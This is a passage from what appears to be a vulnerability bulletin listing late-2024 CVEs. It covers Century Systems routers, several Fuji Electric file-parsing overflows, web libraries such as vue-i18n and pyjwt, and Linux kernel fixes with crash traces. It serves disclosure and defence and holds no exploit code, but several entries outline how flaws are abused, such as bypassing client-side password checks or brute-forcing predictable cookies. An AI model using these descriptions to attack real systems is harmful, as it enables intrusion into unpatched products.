FutureNet NXR series routers provided by Century Systems Co., Ltd. have REST-APIs, which are configured as disabled in the initial (factory default) configuration. But, REST-APIs are unexpectedly enabled when the affected product is powered up, provided either http-server (GUI) or Web authentication is enabled. The factory default configuration makes http-server (GUI) enabled, which means REST-APIs are also enabled. The username and the password for REST-APIs are configured in the factory default configuration. As a result, an attacker may obtain and/or alter the affected product's settings via REST-APIs. | 2024-11-29 | not yet calculated | CVE-2024-50357 |
| Checkmk GmbH--Checkmk |
Insertion of Sensitive Information into Log File in Checkmk GmbH's Checkmk versions <2.3.0p22, <2.2.0p37, <2.1.0p50 (EOL) causes remote site secrets to be written to web log files accessible to local site users. | 2024-11-29 | not yet calculated | CVE-2024-47094 |
| contiki-ng--contiki-ng |
Contiki-NG is an open-source, cross-platform operating system for IoT devices. The Contiki-NG operating system processes source routing headers (SRH) in its two alternative RPL protocol implementations. The IPv6 implementation uses the results of this processing to determine whether an incoming packet should be forwarded to another host. Because of missing validation of the resulting next-hop address, an uncontrolled recursion may occur in the tcpip_ipv6_output function in the os/net/ipv6/tcpip.c module when receiving a packet with a next-hop address that is a local address. Attackers that have the possibility to send IPv6 packets to the Contiki-NG host can therefore trigger deeply nested recursive calls, which can cause a stack overflow. The vulnerability has not been patched in the current release of Contiki-NG, but is expected to be patched in the next release. The problem can be fixed by applying the patch in Contiki-NG pull request #2264. Users are advised to either apply the patch manually or to wait for the next release. There are no known workarounds for this vulnerability. | 2024-11-27 | not yet calculated | CVE-2023-29001 |
| Devolutions--XTS.NET |
Non constant time cryptographic operation in Devolutions.XTS.NET 2024.11.19 and earlier allows an attacker to render half of the encryption key obsolete via a timing attacks | 2024-11-27 | not yet calculated | CVE-2024-11862 |
| drakkan--sftpgo |
sftpgo is a full-featured and highly configurable event-driven file transfer solution. Server protocols: SFTP, HTTP/S, FTP/S, WebDAV. The OpenID Connect implementation allows authenticated users to brute force session cookies and thereby gain access to other users' data, since the cookies are generated predictably using the xid library and are therefore unique but not cryptographically secure. This issue was fixed in version v2.6.4, where cookies are opaque and cryptographically secure strings. All users are advised to upgrade. There are no known workarounds for this vulnerability. | 2024-11-29 | not yet calculated | CVE-2024-52801 |
| editorconfig--editorconfig-core-c |
editorconfig-core-c is theEditorConfig core library written in C (for use by plugins supporting EditorConfig parsing). In affected versions several overflows may occur in switch case '[' when the input pattern contains many escaped characters. The added backslashes leave too little space in the output pattern when processing nested brackets such that the remaining input length exceeds the output capacity. This issue has been addressed in release version 0.12.7. Users are advised to upgrade. There are no known workarounds for this vulnerability. | 2024-11-27 | not yet calculated | CVE-2024-53849 |
| ethyca--fides |
Fides is an open-source privacy engineering platform. The user invite acceptance API endpoint lacks server-side password policy enforcement, allowing users to set arbitrarily weak passwords by bypassing client-side validation. While the UI enforces password complexity requirements, direct API calls can circumvent these checks, enabling the creation of accounts with passwords as short as a single character. When an email messaging provider is enabled and a new user account is created in the system, an invite email containing a special link is sent to the new user's email address. This link directs the new user to a page where they can set their initial password. While the user interface implements password complexity checks, these validations are only performed client-side. The underlying `/api/v1/user/accept-invite` API endpoint does not implement the same password policy validations. This vulnerability allows an invited user to set an extremely weak password for their own account during the initial account setup process. Therefore that specific user's account can be compromised easily by an attacker guessing or brute forcing the password. The vulnerability has been patched in Fides version `2.50.0`. Users are advised to upgrade to this version or later to secure their systems against this threat. There are no known workarounds for this vulnerability. | 2024-11-26 | not yet calculated | CVE-2024-52008 |
| FCNT LLC--arrows N F-51C |
Multiple FCNT Android devices provide the original security features such as "privacy mode" where arbitrary applications can be set not to be displayed, etc. Under certain conditions, and when an attacker can directly operate the device which its screen is unlocked by a user, the provided security features' setting pages may be exposed and/or the settings may be altered, without authentication. For example, specific applications in the device configured to be hidden may be displayed and/or activated. | 2024-11-29 | not yet calculated | CVE-2024-53701 |
| Fuji Electric--Monitouch V-SFT |
Fuji Electric Monitouch V-SFT V10 File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Fuji Electric Monitouch V-SFT. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of V10 files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24413. | 2024-11-28 | not yet calculated | CVE-2024-11787 |
| Fuji Electric--Monitouch V-SFT |
Fuji Electric Monitouch V-SFT V10 File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Fuji Electric Monitouch V-SFT. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of V10 files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24448. | 2024-11-28 | not yet calculated | CVE-2024-11789 |
| Fuji Electric--Monitouch V-SFT |
Fuji Electric Monitouch V-SFT V10 File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Fuji Electric Monitouch V-SFT. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of V10 files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24449. | 2024-11-28 | not yet calculated | CVE-2024-11790 |
| Fuji Electric--Monitouch V-SFT |
Fuji Electric Monitouch V-SFT V8C File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Fuji Electric Monitouch V-SFT. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of V8C files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24450. | 2024-11-28 | not yet calculated | CVE-2024-11791 |
| Fuji Electric--Monitouch V-SFT |
Fuji Electric Monitouch V-SFT V8 File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Fuji Electric Monitouch V-SFT. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of V8 files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24502. | 2024-11-28 | not yet calculated | CVE-2024-11792 |
| Fuji Electric--Monitouch V-SFT |
Fuji Electric Monitouch V-SFT V9C File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Fuji Electric Monitouch V-SFT. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of V9C files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24503. | 2024-11-28 | not yet calculated | CVE-2024-11793 |
| Fuji Electric--Monitouch V-SFT |
Fuji Electric Monitouch V-SFT V10 File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Fuji Electric Monitouch V-SFT. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of V10 files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24504. | 2024-11-28 | not yet calculated | CVE-2024-11794 |
| Fuji Electric--Monitouch V-SFT |
Fuji Electric Monitouch V-SFT V8 File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Fuji Electric Monitouch V-SFT. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of V8 files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24505. | 2024-11-28 | not yet calculated | CVE-2024-11795 |
| Fuji Electric--Monitouch V-SFT |
Fuji Electric Monitouch V-SFT V9C File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Fuji Electric Monitouch V-SFT. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of V9C files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24506. | 2024-11-28 | not yet calculated | CVE-2024-11796 |
| Fuji Electric--Monitouch V-SFT |
Fuji Electric Monitouch V-SFT V8 File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Fuji Electric Monitouch V-SFT. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of V8 files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24662. | 2024-11-28 | not yet calculated | CVE-2024-11797 |
| Fuji Electric--Monitouch V-SFT |
Fuji Electric Monitouch V-SFT X1 File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Fuji Electric Monitouch V-SFT. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of X1 files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24663. | 2024-11-28 | not yet calculated | CVE-2024-11798 |
| Fuji Electric--Monitouch V-SFT |
Fuji Electric Monitouch V-SFT X1 File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Fuji Electric Monitouch V-SFT. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of X1 files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24548. | 2024-11-28 | not yet calculated | CVE-2024-11933 |
| Fuji Electric--Tellus Lite |
Fuji Electric Tellus Lite V-Simulator 5 V8 File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Fuji Electric Tellus Lite. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of V8 files in the V-Simulator 5 component. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24664. | 2024-11-28 | not yet calculated | CVE-2024-11799 |
| Fuji Electric--Tellus Lite |
Fuji Electric Tellus Lite V-Simulator 5 V8 File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Fuji Electric Tellus Lite. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of V8 files in the V-Simulator 5 component. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24768. | 2024-11-28 | not yet calculated | CVE-2024-11800 |
| Fuji Electric--Tellus Lite |
Fuji Electric Tellus Lite V-Simulator 5 V8 File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Fuji Electric Tellus Lite. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of V8 files in the V-Simulator 5 component. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated data structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24769. | 2024-11-28 | not yet calculated | CVE-2024-11801 |
| Fuji Electric--Tellus Lite |
Fuji Electric Tellus Lite V-Simulator 5 V8 File Parsing Stack-Based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Fuji Electric Tellus Lite. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of V8 files in the V-Simulator 5 component. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24770. | 2024-11-28 | not yet calculated | CVE-2024-11802 |
| Fuji Electric--Tellus Lite |
Fuji Electric Tellus Lite V-Simulator 5 V8 File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Fuji Electric Tellus Lite. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of V8 files in the V-Simulator 5 component. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated data structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24771. | 2024-11-28 | not yet calculated | CVE-2024-11803 |
| Galaxy Software Services Corporation--iota C.ai Conversational Platform |
A improper verification of cryptographic signature vulnerability in plugin management in iota C.ai Conversational Platform from 1.0.0 through 2.1.3 allows remote authenticated users to load a malicious DLL via upload plugin function. | 2024-11-27 | not yet calculated | CVE-2024-52958 |
| Galaxy Software Services Corporation--iota C.ai Conversational Platform |
A Improper Control of Generation of Code ('Code Injection') vulnerability in plugin management in iota C.ai Conversational Platform from 1.0.0 through 2.1.3 allows remote authenticated users to perform arbitrary system commands via a DLL file. | 2024-11-27 | not yet calculated | CVE-2024-52959 |
| gqevu6bsiz--WP Admin UI Customize |
Cross-site scripting vulnerability exists in WP Admin UI Customize versions prior to ver 1.5.14. If a malicious admin user customizes the admin screen with some malicious contents, an arbitrary script may be executed on the web browser of the other users who are accessing the admin screen. | 2024-11-26 | not yet calculated | CVE-2024-53278 |
| grpc--gRPC-C++ |
There exists a denial of service through Data corruption in gRPC-C++ - gRPC-C++ servers with transmit zero copy enabled through the channel arg GRPC_ARG_TCP_TX_ZEROCOPY_ENABLED can experience data corruption issues. The data sent by the application may be corrupted before transmission over the network thus leading the receiver to receive an incorrect set of bytes causing RPC requests to fail. We recommend upgrading past commit e9046b2bbebc0cb7f5dc42008f807f6c7e98e791 | 2024-11-26 | not yet calculated | CVE-2024-11407 |
| HAProxy Project--HAProxy 2.6 |
Inconsistent interpretation of HTTP requests ('HTTP Request/Response Smuggling') issue exists in HAProxy. If this vulnerability is exploited, a remote attacker may access a path that is restricted by ACL (Access Control List) set on the product. As a result, the attacker may obtain sensitive information. | 2024-11-28 | not yet calculated | CVE-2024-53008 |
| ibexa--admin-ui |
Ibexa Admin UI Bundle is all the necessary parts to run the Ibexa DXP Back Office interface. The Content name pattern is used to build Content names from one or more fields. An XSS vulnerability has been found in this mechanism. Content edit permission is required to exploit it. After the fix, any existing injected XSS will not run. This issue has been patched in version 4.6.14. All users are advised to upgrade. There are no known workarounds for this vulnerability. | 2024-11-29 | not yet calculated | CVE-2024-53864 |
| intlify--vue-i18n |
vue-i18n is an internationalization plugin for Vue.js. In affected versions vue-i18n can be passed locale messages to `createI18n` or `useI18n`. When locale message ASTs are generated in development mode there is a possibility of Cross-site Scripting attack. This issue has been addressed in versions 9.14.2, and 10.0.5. Users are advised to upgrade. There are no known workarounds for this vulnerability. | 2024-11-29 | not yet calculated | CVE-2024-52809 |
| intlify--vue-i18n |
@intlify/shared is a shared library for the intlify project. The latest version of @intlify/shared (10.0.4) is vulnerable to Prototype Pollution through the entry function(s) lib.deepCopy. An attacker can supply a payload with Object.prototype setter to introduce or modify properties within the global prototype chain, causing denial of service (DoS) as the minimum consequence. Moreover, the consequences of this vulnerability can escalate to other injection-based attacks, depending on how the library integrates within the application. For instance, if the polluted property propagates to sensitive Node.js APIs (e.g., exec, eval), it could enable an attacker to execute arbitrary commands within the application's context. This issue has been addressed in versions 9.14.2, and 10.0.5. Users are advised to upgrade. There are no known workarounds for this vulnerability. | 2024-11-29 | not yet calculated | CVE-2024-52810 |
| jpadilla--pyjwt |
pyjwt is a JSON Web Token implementation in Python. An incorrect string comparison is run for `iss` checking, resulting in `"acb"` being accepted for `"_abc_"`. This is a bug introduced in version 2.10.0: checking the "iss" claim changed from `isinstance(issuer, list)` to `isinstance(issuer, Sequence)`. Since str is a Sequnce, but not a list, `in` is also used for string comparison. This results in `if "abc" not in "__abcd__":` being checked instead of `if "abc" != "__abc__":`. Signature checks are still present so real world impact is likely limited to denial of service scenarios. This issue has been patched in version 2.10.1. All users are advised to upgrade. There are no known workarounds for this vulnerability. | 2024-11-29 | not yet calculated | CVE-2024-53861 |
| libjxl--libjxl |
There exists an out of bounds read/write in LibJXL versions prior to commit 9cc451b91b74ba470fd72bd48c121e9f33d24c99. The JPEG decoder used by the JPEG XL encoder when doing JPEG recompression (i.e. if using JxlEncoderAddJPEGFrame on untrusted input) does not properly check bounds in the presence of incomplete codes. This could lead to an out-of-bounds write. In jpegli which is released as part of the same project, the same vulnerability is present. However, the relevant buffer is part of a bigger structure, and the code makes no assumptions on the values that could be overwritten. The issue could however cause jpegli to read uninitialised memory, or addresses of functions. | 2024-11-25 | not yet calculated | CVE-2024-11403 |
| libjxl--libjxl |
There exists a stack buffer overflow in libjxl. A specifically-crafted file can cause the JPEG XL decoder to use large amounts of stack space (up to 256mb is possible, maybe 512mb), potentially exhausting the stack. An attacker can craft a file that will cause excessive memory usage. We recommend upgrading past commit 65fbec56bc578b6b6ee02a527be70787bbd053b0. | 2024-11-25 | not yet calculated | CVE-2024-11498 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: can: bcm: Fix UAF in bcm_proc_show() BUG: KASAN: slab-use-after-free in bcm_proc_show+0x969/0xa80 Read of size 8 at addr ffff888155846230 by task cat/7862 CPU: 1 PID: 7862 Comm: cat Not tainted 6.5.0-rc1-00153-gc8746099c197 #230 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014 Call Trace: <TASK> dump_stack_lvl+0xd5/0x150 print_report+0xc1/0x5e0 kasan_report+0xba/0xf0 bcm_proc_show+0x969/0xa80 seq_read_iter+0x4f6/0x1260 seq_read+0x165/0x210 proc_reg_read+0x227/0x300 vfs_read+0x1d5/0x8d0 ksys_read+0x11e/0x240 do_syscall_64+0x35/0xb0 entry_SYSCALL_64_after_hwframe+0x63/0xcd Allocated by task 7846: kasan_save_stack+0x1e/0x40 kasan_set_track+0x21/0x30 __kasan_kmalloc+0x9e/0xa0 bcm_sendmsg+0x264b/0x44e0 sock_sendmsg+0xda/0x180 ____sys_sendmsg+0x735/0x920 ___sys_sendmsg+0x11d/0x1b0 __sys_sendmsg+0xfa/0x1d0 do_syscall_64+0x35/0xb0 entry_SYSCALL_64_after_hwframe+0x63/0xcd Freed by task 7846: kasan_save_stack+0x1e/0x40 kasan_set_track+0x21/0x30 kasan_save_free_info+0x27/0x40 ____kasan_slab_free+0x161/0x1c0 slab_free_freelist_hook+0x119/0x220 __kmem_cache_free+0xb4/0x2e0 rcu_core+0x809/0x1bd0 bcm_op is freed before procfs entry be removed in bcm_release(), this lead to bcm_proc_show() may read the freed bcm_op. | 2024-11-28 | not yet calculated | CVE-2023-52922 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: mm: resolve faulty mmap_region() error path behaviour The mmap_region() function is somewhat terrifying, with spaghetti-like control flow and numerous means by which issues can arise and incomplete state, memory leaks and other unpleasantness can occur. A large amount of the complexity arises from trying to handle errors late in the process of mapping a VMA, which forms the basis of recently observed issues with resource leaks and observable inconsistent state. Taking advantage of previous patches in this series we move a number of checks earlier in the code, simplifying things by moving the core of the logic into a static internal function __mmap_region(). Doing this allows us to perform a number of checks up front before we do any real work, and allows us to unwind the writable unmap check unconditionally as required and to perform a CONFIG_DEBUG_VM_MAPLE_TREE validation unconditionally also. We move a number of things here: 1. We preallocate memory for the iterator before we call the file-backed memory hook, allowing us to exit early and avoid having to perform complicated and error-prone close/free logic. We carefully free iterator state on both success and error paths. 2. The enclosing mmap_region() function handles the mapping_map_writable() logic early. Previously the logic had the mapping_map_writable() at the point of mapping a newly allocated file-backed VMA, and a matching mapping_unmap_writable() on success and error paths. We now do this unconditionally if this is a file-backed, shared writable mapping. If a driver changes the flags to eliminate VM_MAYWRITE, however doing so does not invalidate the seal check we just performed, and we in any case always decrement the counter in the wrapper. We perform a debug assert to ensure a driver does not attempt to do the opposite. 3. We also move arch_validate_flags() up into the mmap_region() function. This is only relevant on arm64 and sparc64, and the check is only meaningful for SPARC with ADI enabled. We explicitly add a warning for this arch if a driver invalidates this check, though the code ought eventually to be fixed to eliminate the need for this. With all of these measures in place, we no longer need to explicitly close the VMA on error paths, as we place all checks which might fail prior to a call to any driver mmap hook. This eliminates an entire class of errors, makes the code easier to reason about and more robust. | 2024-11-25 | not yet calculated | CVE-2024-53096 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: mm: krealloc: Fix MTE false alarm in __do_krealloc This patch addresses an issue introduced by commit 1a83a716ec233 ("mm: krealloc: consider spare memory for __GFP_ZERO") which causes MTE (Memory Tagging Extension) to falsely report a slab-out-of-bounds error. The problem occurs when zeroing out spare memory in __do_krealloc. The original code only considered software-based KASAN and did not account for MTE. It does not reset the KASAN tag before calling memset, leading to a mismatch between the pointer tag and the memory tag, resulting in a false positive. Example of the error: ================================================================== swapper/0: BUG: KASAN: slab-out-of-bounds in __memset+0x84/0x188 swapper/0: Write at addr f4ffff8005f0fdf0 by task swapper/0/1 swapper/0: Pointer tag: [f4], memory tag: [fe] swapper/0: swapper/0: CPU: 4 UID: 0 PID: 1 Comm: swapper/0 Not tainted 6.12. swapper/0: Hardware name: MT6991(ENG) (DT) swapper/0: Call trace: swapper/0: dump_backtrace+0xfc/0x17c swapper/0: show_stack+0x18/0x28 swapper/0: dump_stack_lvl+0x40/0xa0 swapper/0: print_report+0x1b8/0x71c swapper/0: kasan_report+0xec/0x14c swapper/0: __do_kernel_fault+0x60/0x29c swapper/0: do_bad_area+0x30/0xdc swapper/0: do_tag_check_fault+0x20/0x34 swapper/0: do_mem_abort+0x58/0x104 swapper/0: el1_abort+0x3c/0x5c swapper/0: el1h_64_sync_handler+0x80/0xcc swapper/0: el1h_64_sync+0x68/0x6c swapper/0: __memset+0x84/0x188 swapper/0: btf_populate_kfunc_set+0x280/0x3d8 swapper/0: __register_btf_kfunc_id_set+0x43c/0x468 swapper/0: register_btf_kfunc_id_set+0x48/0x60 swapper/0: register_nf_nat_bpf+0x1c/0x40 swapper/0: nf_nat_init+0xc0/0x128 swapper/0: do_one_initcall+0x184/0x464 swapper/0: do_initcall_level+0xdc/0x1b0 swapper/0: do_initcalls+0x70/0xc0 swapper/0: do_basic_setup+0x1c/0x28 swapper/0: kernel_init_freeable+0x144/0x1b8 swapper/0: kernel_init+0x20/0x1a8 swapper/0: ret_from_fork+0x10/0x20 ================================================================== | 2024-11-25 | not yet calculated | CVE-2024-53097 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: drm/xe/ufence: Prefetch ufence addr to catch bogus address access_ok() only checks for addr overflow so also try to read the addr to catch invalid addr sent from userspace. (cherry picked from commit 9408c4508483ffc60811e910a93d6425b8e63928) | 2024-11-25 | not yet calculated | CVE-2024-53098 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: bpf: Check validity of link->type in bpf_link_show_fdinfo() If a newly-added link type doesn't invoke BPF_LINK_TYPE(), accessing bpf_link_type_strs[link->type] may result in an out-of-bounds access. To spot such missed invocations early in the future, checking the validity of link->type in bpf_link_show_fdinfo() and emitting a warning when such invocations are missed. | 2024-11-25 | not yet calculated | CVE-2024-53099 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: nvme: tcp: avoid race between queue_lock lock and destroy Commit 76d54bf20cdc ("nvme-tcp: don't access released socket during error recovery") added a mutex_lock() call for the queue->queue_lock in nvme_tcp_get_address(). However, the mutex_lock() races with mutex_destroy() in nvme_tcp_free_queue(), and causes the WARN below. DEBUG_LOCKS_WARN_ON(lock->magic != lock) WARNING: CPU: 3 PID: 34077 at kernel/locking/mutex.c:587 __mutex_lock+0xcf0/0x1220 Modules linked in: nvmet_tcp nvmet nvme_tcp nvme_fabrics iw_cm ib_cm ib_core pktcdvd nft_fib_inet nft_fib_ipv4 nft_fib_ipv6 nft_fib nft_reject_inet nf_reject_ipv4 nf_reject_ipv6 nft_reject nft_ct nft_chain_nat nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 ip_set nf_tables qrtr sunrpc ppdev 9pnet_virtio 9pnet pcspkr netfs parport_pc parport e1000 i2c_piix4 i2c_smbus loop fuse nfnetlink zram bochs drm_vram_helper drm_ttm_helper ttm drm_kms_helper xfs drm sym53c8xx floppy nvme scsi_transport_spi nvme_core nvme_auth serio_raw ata_generic pata_acpi dm_multipath qemu_fw_cfg [last unloaded: ib_uverbs] CPU: 3 UID: 0 PID: 34077 Comm: udisksd Not tainted 6.11.0-rc7 #319 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-2.fc40 04/01/2014 RIP: 0010:__mutex_lock+0xcf0/0x1220 Code: 08 84 d2 0f 85 c8 04 00 00 8b 15 ef b6 c8 01 85 d2 0f 85 78 f4 ff ff 48 c7 c6 20 93 ee af 48 c7 c7 60 91 ee af e8 f0 a7 6d fd <0f> 0b e9 5e f4 ff ff 48 b8 00 00 00 00 00 fc ff df 4c 89 f2 48 c1 RSP: 0018:ffff88811305f760 EFLAGS: 00010286 RAX: 0000000000000000 RBX: ffff88812c652058 RCX: 0000000000000000 RDX: 0000000000000000 RSI: 0000000000000004 RDI: 0000000000000001 RBP: ffff88811305f8b0 R08: 0000000000000001 R09: ffffed1075c36341 R10: ffff8883ae1b1a0b R11: 0000000000010498 R12: 0000000000000000 R13: 0000000000000000 R14: dffffc0000000000 R15: ffff88812c652058 FS: 00007f9713ae4980(0000) GS:ffff8883ae180000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007fcd78483c7c CR3: 0000000122c38000 CR4: 00000000000006f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> ? __warn.cold+0x5b/0x1af ? __mutex_lock+0xcf0/0x1220 ? report_bug+0x1ec/0x390 ? handle_bug+0x3c/0x80 ? exc_invalid_op+0x13/0x40 ? asm_exc_invalid_op+0x16/0x20 ? __mutex_lock+0xcf0/0x1220 ? nvme_tcp_get_address+0xc2/0x1e0 [nvme_tcp] ? __pfx___mutex_lock+0x10/0x10 ? __lock_acquire+0xd6a/0x59e0 ? nvme_tcp_get_address+0xc2/0x1e0 [nvme_tcp] nvme_tcp_get_address+0xc2/0x1e0 [nvme_tcp] ? __pfx_nvme_tcp_get_address+0x10/0x10 [nvme_tcp] nvme_sysfs_show_address+0x81/0xc0 [nvme_core] dev_attr_show+0x42/0x80 ? __asan_memset+0x1f/0x40 sysfs_kf_seq_show+0x1f0/0x370 seq_read_iter+0x2cb/0x1130 ? rw_verify_area+0x3b1/0x590 ? __mutex_lock+0x433/0x1220 vfs_read+0x6a6/0xa20 ? lockdep_hardirqs_on+0x78/0x100 ? __pfx_vfs_read+0x10/0x10 ksys_read+0xf7/0x1d0 ? __pfx_ksys_read+0x10/0x10 ? __x64_sys_openat+0x105/0x1d0 do_syscall_64+0x93/0x180 ? lockdep_hardirqs_on_prepare+0x16d/0x400 ? do_syscall_64+0x9f/0x180 ? lockdep_hardirqs_on+0x78/0x100 ? do_syscall_64+0x9f/0x180 ? __pfx_ksys_read+0x10/0x10 ? lockdep_hardirqs_on_prepare+0x16d/0x400 ? do_syscall_64+0x9f/0x180 ? lockdep_hardirqs_on+0x78/0x100 ? do_syscall_64+0x9f/0x180 ? lockdep_hardirqs_on_prepare+0x16d/0x400 ? do_syscall_64+0x9f/0x180 ? lockdep_hardirqs_on+0x78/0x100 ? do_syscall_64+0x9f/0x180 ? lockdep_hardirqs_on_prepare+0x16d/0x400 ? do_syscall_64+0x9f/0x180 ? lockdep_hardirqs_on+0x78/0x100 ? do_syscall_64+0x9f/0x180 ? lockdep_hardirqs_on_prepare+0x16d/0x400 ? do_syscall_64+0x9f/0x180 ? lockdep_hardirqs_on+0x78/0x100 ? do_syscall_64+0x9f/0x180 ? do_syscall_64+0x9f/0x180 entry_SYSCALL_64_after_hwframe+0x76/0x7e RIP: 0033:0x7f9713f55cfa Code: 55 48 89 e5 48 83 ec 20 48 89 55 e8 48 89 75 f0 89 7d f8 e8 e8 74 f8 ff 48 8b 55 e8 48 8b 75 f0 4 ---truncated--- | 2024-11-25 | not yet calculated | CVE-2024-53100 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: fs: Fix uninitialized value issue in from_kuid and from_kgid ocfs2_setattr() uses attr->ia_mode, attr->ia_uid and attr->ia_gid in a trace point even though ATTR_MODE, ATTR_UID and ATTR_GID aren't set. Initialize all fields of newattrs to avoid uninitialized variables, by checking if ATTR_MODE, ATTR_UID, ATTR_GID are initialized, otherwise 0. | 2024-11-25 | not yet calculated | CVE-2024-53101 |
| Linux--Linux |
